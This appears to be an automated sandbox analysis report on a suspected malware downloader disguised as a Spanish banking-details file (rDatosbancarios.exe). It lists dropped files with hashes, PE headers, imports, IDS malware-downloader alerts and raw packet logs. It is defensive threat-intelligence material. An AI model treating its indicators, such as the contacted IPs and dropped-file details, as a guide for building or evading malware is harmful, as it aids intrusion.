
                                                                            C:\Users\user\skraldemnd\Foreprovided\Dowl\taintable.exc

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):55848
                                                                            Entropy (8bit):1.2387501956568354
                                                                            Encrypted:false
                                                                            SSDEEP:192:1w8kCYQS+bJkaIsu+DdFEdgY1ZUzNiwl3xRuqYkU4sIJ05KrZbYqBP9FXDU6onA/:u7/VstblBMVu0UrJr5+AYEw6
                                                                            MD5:5E62DAA89B112148219B9BFE1787C7D4
                                                                            SHA1:B1F60EEA844142A8131387113F9CA942D2BD620C
                                                                            SHA-256:4EA27D7EEAF127D67948CD36EA1253C7B2B8F378E5C40B771813AC0C841181E1
                                                                            SHA-512:6E01F7A15EDB67704D8A791A3FC56BFE3C05EF608C45BA2EECF24808BE65126CAE5AD382CF37AC4688B5EA82FE9033FEE84F83CFE4467606346CFE991889CC6C
                                                                            Malicious:false
                                                                            Preview:....L.7...................................../.......X..................................6.............z...................................................................J................................`..O......................................................;.............................c.........................h.........$............H...............................................K.......V`.....k........................G..............................................D.s................................0.............................b........................M.......................................................................1.............T...R.(X..............................................................................w..e.........................................................7...............-.....................................................................................................................f....M.............j.......................................

                                                                            C:\Users\user\skraldemnd\Foreprovided\Dowl\undesigningness.jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 710x567, components 3
                                                                            Category:dropped
                                                                            Size (bytes):40259
                                                                            Entropy (8bit):7.952041876448999
                                                                            Encrypted:false
                                                                            SSDEEP:768:vj//fFIkWPCc+UwxaGRlJoYKLtAOMREp/fOjg2OdSp49GpkH:vT/9I96tUwxaGRlJoYKLt2Y+j7OUewu
                                                                            MD5:FD464BBCF2F136AED1CEDFD5A8335ADB
                                                                            SHA1:C6D41BFCF04645C5E9F252F4459C2E6E1319C138
                                                                            SHA-256:F01B19A0D1E50B1DFBC9FB63C726D96B21FEA045C4664E14EBD24DA4EB95BB3F
                                                                            SHA-512:B5BCF3E524695F381E2982227155474E7DEB7B271C7888D7E91913C9AA165B504A15F1D097E4F4D8B4034D74C01DA413F4E676A4BF845B90FF8C2A016509BE69
                                                                            Malicious:false
                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......7...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......S.qX. .....9....\w....b..F;P......`.@....iz.p..h..).\g.JB.-.4.)..F.;h...pE&1@......0R......."....02.!=..b...)....m$q@..iv..b.. ...L..)......&3................c.Q.....C..p.S..|...L..I.E.4.z.O...4...(..p.S..&......`4.g.H*H..@.0...T...{.EV.....|.............m.......e$..d..9.)...<....a..G..(.S.S..'.).x...4..8..y.<.o.@.w.)..".:..]~l...A...{..Ga],..._}..

                                                                            C:\Users\user\skraldemnd\Foreprovided\Kernevaabnene.Str

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):444702
                                                                            Entropy (8bit):2.648488347981852
                                                                            Encrypted:false
                                                                            SSDEEP:3072:5SP3KOgBWE8BkKTBYTJeQDnLIHqBIScByLfhX:5SPBgBWE8qKTBUJeQDLKqBEByLfhX
                                                                            MD5:003E923806FC8376F500D36B0B05BE30
                                                                            SHA1:B9B8C97E947227D0EF33CF1B55D1EF27612CF246
                                                                            SHA-256:277C60BBE6E2D407EE129B314FB0A6F9DCDAEB37E8E16EBFAF60DEEE77378123
                                                                            SHA-512:385596D43758584EB088D097C663E45441CC4EAC165DBEAF46416B621D552959731AC0E1CEF9D7F7ACAF1F7E7917961190CFE245AC29F561E682B5F0BA5184E2
                                                                            Malicious:false
                                                                            Preview:0000C2001F1F004E4E4E00000000000000EDEDED0000006464005C00E7E7E7000035350000005656002B00000000000000F7F7F7F7F7006767004600B000D6005C003A3A3A002222222222000057001B000000003A00C0C0C00000FCFC00007F7F7F7F7F7F0000670000000E0000000000630000000000D6001313006F003535353500210000C7C700004C4C000033333333333333333333007A7A7A00000000C2009F9F007A7A7A7A7A7A00969600000000009E9E002F0000F9F9F9F90000DF0064646400D80000FF00D50000B5B5B5B5B5000000EB009600A00000005656005050500013131300000000000000B50000CCCC0000000000000094940000510000009C0000737373000000000012002B2B00000000BD0006060600000C000000FC00EC0000004B001500C6C6C6C60000006D6D000000C9C9C9C9C9C9C9008989898900000000560000D9D900F8F8F8F8F80000007F7F00004E0000C20000007C7C000000E9E9E9E900006868002000000000F6F6F6F6F600D0D0D0D0D0D0D000005D000000007800840000000000000000005555000076005959000000860000000000D0D000000000008686004000750038000000CCCCCC00001900570000EBEB00969600A4A4A4A4A40000A0A0004F0000000E005100F2F200820000002500C5C500D9D900CE000000AE000000009292006300

                                                                            C:\Users\user\skraldemnd\Foreprovided\Marcasitic.Fer

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):214902
                                                                            Entropy (8bit):7.487368942112461
                                                                            Encrypted:false
                                                                            SSDEEP:3072:FG7h341X9ZHM4tDrGX5rXH//SQsYWjDnDRS9MY9Ddq/gdkd3/HIuYuIhTNmenzDC:Md3assDrGp7nSnA5q/b3/4zP5vzCbOiD
                                                                            MD5:0F448C11B8AAAC4934B9FC9E2F432A35
                                                                            SHA1:6BA5F7658520CADDA40899E3AD33A9E4D15FD57B
                                                                            SHA-256:EDF4A2834DF1E9598E1B019A560843F36381915EEEF4FC6C49CC717F90C82183
                                                                            SHA-512:1AD633397BCBDC26F7444D2BE82BE2EAB8E4008B970C4030AB9FA8D194BF94AAE463EEF16F67F45966B55511527D97DBAB54DCDD4A61CF74A065191F366FB620
                                                                            Malicious:false
                                                                            Preview:........................................................zz..........u......B..............................................hhh....................''''''.5...........................W......pppp...............U..................... .......SS........--..#.................qqqqq...Y.......s...........\..cc.....HHHH....fff..................^....X..==.......................^..................j..d......................&......m...........bbb...................................b.88..................p...M..##.cc....V.................................EE.@........nn....$$.????...............R........C.......U...p..........33.7......k......................^^......lll.......DDDD..RR.........................eee...........>>>>>.[.......n............6.'...................................ff...................................i.rr.ZZZ...................uuuuu..................................:................``.....``......SS.......................u........eeeeeeeeee.O.........................X.............qq.

                                                                            C:\Users\user\skraldemnd\Stooling\unmanfulness.ini

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):459
                                                                            Entropy (8bit):4.432435243733704
                                                                            Encrypted:false
                                                                            SSDEEP:12:CF52tlLh2VARXPDKnPLhZBKRWbB/UFBZwvqzTEx3:ftRhSObKnvGWbpKBZnz2
                                                                            MD5:C3ABBB621BF861C4CAF283BE1271575D
                                                                            SHA1:439D4085265E02E2796EB641DF825B84AC521263
                                                                            SHA-256:2671B868DB88CA59430325392ECC572A70FF593D3226A9DC44471DDED94B59A5
                                                                            SHA-512:636FE8A12001BC3F82047662B1F490423F4A63CFD49177585432F4C505CE94962A172BA61BC2471DEB81C6A17910848BC6A2101638EE8F0A7A8DF2231BF7E65C
                                                                            Malicious:false
                                                                            Preview:endotrophic smokily evakueredes airwomen bukselommen.Deflectionise silikone digitisation extraovate yens teetsook bjrnetjenestens astraddle subdebutante..whim sufficiente redolences overfasting.Kontrasters bdninger omega..Vestkysters immobilizer autocades svajs traadkurvene indoctrinated kinesisk,udtm gesjftigere goldsmithry tandskive laboursaving zoltans presplendor..[ashamed konventionerne]..Hygrometrene pauciplicate mooching liquorishly sammenrendets..

                                                                            C:\Users\user\skraldemnd\Stooling\vraltet.jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 667x509, components 3
                                                                            Category:dropped
                                                                            Size (bytes):79680
                                                                            Entropy (8bit):7.968459679324831
                                                                            Encrypted:false
                                                                            SSDEEP:1536:lh2SSzAwtkw9d5wNbvZmkPJPu5oBW/x3kX+SQ7ZqXg/:eSSz95YFDPJBhkcXg/
                                                                            MD5:17058D8D0F59BAB826B161633E171AB8
                                                                            SHA1:84FEB30222153AAA7193DC09D2576C5765F35168
                                                                            SHA-256:AF68F5E4C4C224C26BE2AE669D5DD8C88F39777521490A15AE4A2B5613784C77
                                                                            SHA-512:367109170E67B156157E56B443ED1D7DCFD9EAAEC193E80BD2BA90ABA5AD96FF331AFB78891A97EE54ED8EE25F242C32F0CDC6F6525CC6AD83FBD42D40DA6839
                                                                            Malicious:false
                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..p=(...\....F.H...R...mf~......E..b.c.....@....QV..L..1..=..5.c.H..S.H.<.....h......4....8...%;mH..(..m.1F(.=.m.qF(.0..K........l.v...Jq....m...).?j.V.V..T.I.....@X.R.c.[i.(...:i......@X.....Z.M.@..P......iJ..b...^.t.4..q..^...\+M+.@X.b...])M)@X.b..U\)M.@.S0......]4..@X...RyUw...+..^.?j...R.*..6...[*Hl..$D...Q*(+.J...#.ES..xd.....4..TR.h...5U.aA&....29..l.|.

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Entropy (8bit):6.819942335765569
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:rDatosbancarios.exe
                                                                            File size:890'069 bytes
                                                                            MD5:ad465ed89a2c85de228c1eca00ad3c21
                                                                            SHA1:693a1f701261b57a351587afaabcfd7e9e519db2
                                                                            SHA256:05e5731dc9129d9f1019a21fbbb672fa0a01a1bb8e89393e630b75ec38797928
                                                                            SHA512:5cc6ebff13d49f15e640fae88db10d4e87a55ea53f9a4eab0db1e834956f6769d64e75bb846a87660b16bf1a20e01c6c0303b47e44c377bd3efef61bf22d2115
                                                                            SSDEEP:12288:tgykllhWbCCb3vYt1tyLdoHnDw5C8DKSywPjQ887ZsdsRCX0FIiMW:illhWbCCDy1yqV8DZywPsZsdsIkWY
                                                                            TLSH:3015121D3544C992C82EC431A5B781520325DD3C9E896B57EF0BBB3EE872558AB0F72D
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................b...*.......3............@

                                                                            File Icon

                                                                            Icon Hash:519e261b4d279646

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4033b6
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x57956397 [Mon Jul 25 00:55:51 2016 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:4ea4df5d94204fc550be1874e1b77ea7

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            sub esp, 000002D4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            push 00000020h
                                                                            pop edi
                                                                            xor ebx, ebx
                                                                            push 00008001h
                                                                            mov dword ptr [esp+14h], ebx
                                                                            mov dword ptr [esp+10h], 0040A230h
                                                                            mov dword ptr [esp+1Ch], ebx
                                                                            call dword ptr [004080B4h]
                                                                            call dword ptr [004080B0h]
                                                                            cmp ax, 00000006h
                                                                            je 00007F1E49B68FD3h
                                                                            push ebx
                                                                            call 00007F1E49B6C12Ch
                                                                            cmp eax, ebx
                                                                            je 00007F1E49B68FC9h
                                                                            push 00000C00h
                                                                            call eax
                                                                            mov esi, 004082B8h
                                                                            push esi
                                                                            call 00007F1E49B6C0A6h
                                                                            push esi
                                                                            call dword ptr [0040815Ch]
                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                            cmp byte ptr [esi], 00000000h
                                                                            jne 00007F1E49B68FACh
                                                                            push ebp
                                                                            push 00000009h
                                                                            call 00007F1E49B6C0FEh
                                                                            push 00000007h
                                                                            call 00007F1E49B6C0F7h
                                                                            mov dword ptr [0042A244h], eax
                                                                            call dword ptr [0040803Ch]
                                                                            push ebx
                                                                            call dword ptr [004082A4h]
                                                                            mov dword ptr [0042A2F8h], eax
                                                                            push ebx
                                                                            lea eax, dword ptr [esp+34h]
                                                                            push 000002B4h
                                                                            push eax
                                                                            push ebx
                                                                            push 004216E8h
                                                                            call dword ptr [00408188h]
                                                                            push 0040A384h
                                                                            push 00429240h
                                                                            call 00007F1E49B6BCE0h
                                                                            call dword ptr [004080ACh]
                                                                            mov ebp, 00435000h
                                                                            push eax
                                                                            push ebp
                                                                            call 00007F1E49B6BCCEh
                                                                            push ebx
                                                                            call dword ptr [00408174h]
                                                                            add word ptr [eax], 0000h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x42b10.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x615d0x62000b0812166ebbd0109e7f5e007b182949False0.6616709183673469data6.450231726170125IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xa0000x203380x60066b45fceba0f24d768fb09e0afe23c99False0.5026041666666666data3.9824009583068882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .ndata0x2b0000x270000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x520000x42b100x42c00e550e6733de24c79182b96bc7b2532a6False0.1573362886235955data2.401521937595081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x522080x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.15390049412669762
                                                                            RT_DIALOG0x942300x100dataEnglishUnited States0.5234375
                                                                            RT_DIALOG0x943300x11cdataEnglishUnited States0.6091549295774648
                                                                            RT_DIALOG0x944500xc4dataEnglishUnited States0.5918367346938775
                                                                            RT_DIALOG0x945180x60dataEnglishUnited States0.7291666666666666
                                                                            RT_GROUP_ICON0x945780x14dataEnglishUnited States1.1
                                                                            RT_VERSION0x945900x240dataEnglishUnited States0.5260416666666666
                                                                            RT_MANIFEST0x947d00x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                            USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                            ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                            Version Infos

                                                                            DescriptionData
                                                                            CompanyNameskrigenes
                                                                            LegalTrademarksbombardements skattereformen
                                                                            OriginalFilenamedolcan.exe
                                                                            ProductNameummps vinkelhastighedernes
                                                                            ProductVersion1.1.0.0
                                                                            Translation0x0409 0x04e4

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-03-11T08:02:55.349179+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549713172.217.16.142443TCP
                                                                            2025-03-11T08:03:02.458220+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549715158.101.44.24280TCP
                                                                            2025-03-11T08:03:05.223981+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549715158.101.44.24280TCP
                                                                            2025-03-11T08:03:09.275038+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549717104.21.96.1443TCP
                                                                            2025-03-11T08:03:09.911374+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549718158.101.44.24280TCP
                                                                            2025-03-11T08:03:12.958256+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549720158.101.44.24280TCP
                                                                            2025-03-11T08:03:20.166172+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549723104.21.96.1443TCP
                                                                            2025-03-11T08:03:30.111896+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549727104.21.96.1443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 11, 2025 08:02:51.027288914 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:51.027333975 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:51.027420044 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:51.036103010 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:51.036117077 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:54.657250881 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:54.657355070 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:54.658325911 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:54.658392906 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:54.708220005 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:54.708240986 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:54.708664894 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:54.708729029 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:54.711179972 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:54.756318092 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:55.349322081 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:55.349417925 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:55.349442959 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:55.349495888 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:55.349505901 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:55.349550962 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:55.349584103 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:55.350852966 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:55.352615118 CET49713443192.168.2.5172.217.16.142
                                                                            Mar 11, 2025 08:02:55.352632046 CET44349713172.217.16.142192.168.2.5
                                                                            Mar 11, 2025 08:02:55.382184982 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:02:55.382210970 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:02:55.382298946 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:02:55.382540941 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:02:55.382559061 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:02:57.314465046 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:02:57.314574003 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:02:57.319263935 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:02:57.319272995 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:02:57.319673061 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:02:57.319739103 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:02:57.320272923 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:02:57.364331007 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.552167892 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.552310944 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.581140995 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.581233025 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.613120079 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.613183975 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.613231897 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.613276005 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.656461954 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.656548023 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.659912109 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.659972906 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.659984112 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.660032034 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.669471025 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.669553041 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.669562101 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.669605017 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.674781084 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.674854994 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.679758072 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.679824114 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.679847956 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.679896116 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.690392971 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.690454960 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.690520048 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.690565109 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.690589905 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.690634012 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.702919006 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.702964067 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.703577042 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.703628063 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.706676960 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.706718922 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.706772089 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.706813097 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.719259024 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.719310999 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.719357014 CET44349714172.217.16.193192.168.2.5
                                                                            Mar 11, 2025 08:03:00.719398975 CET49714443192.168.2.5172.217.16.193
                                                                            Mar 11, 2025 08:03:00.726197004 CET44349714172.217.16.193192.168.2.5
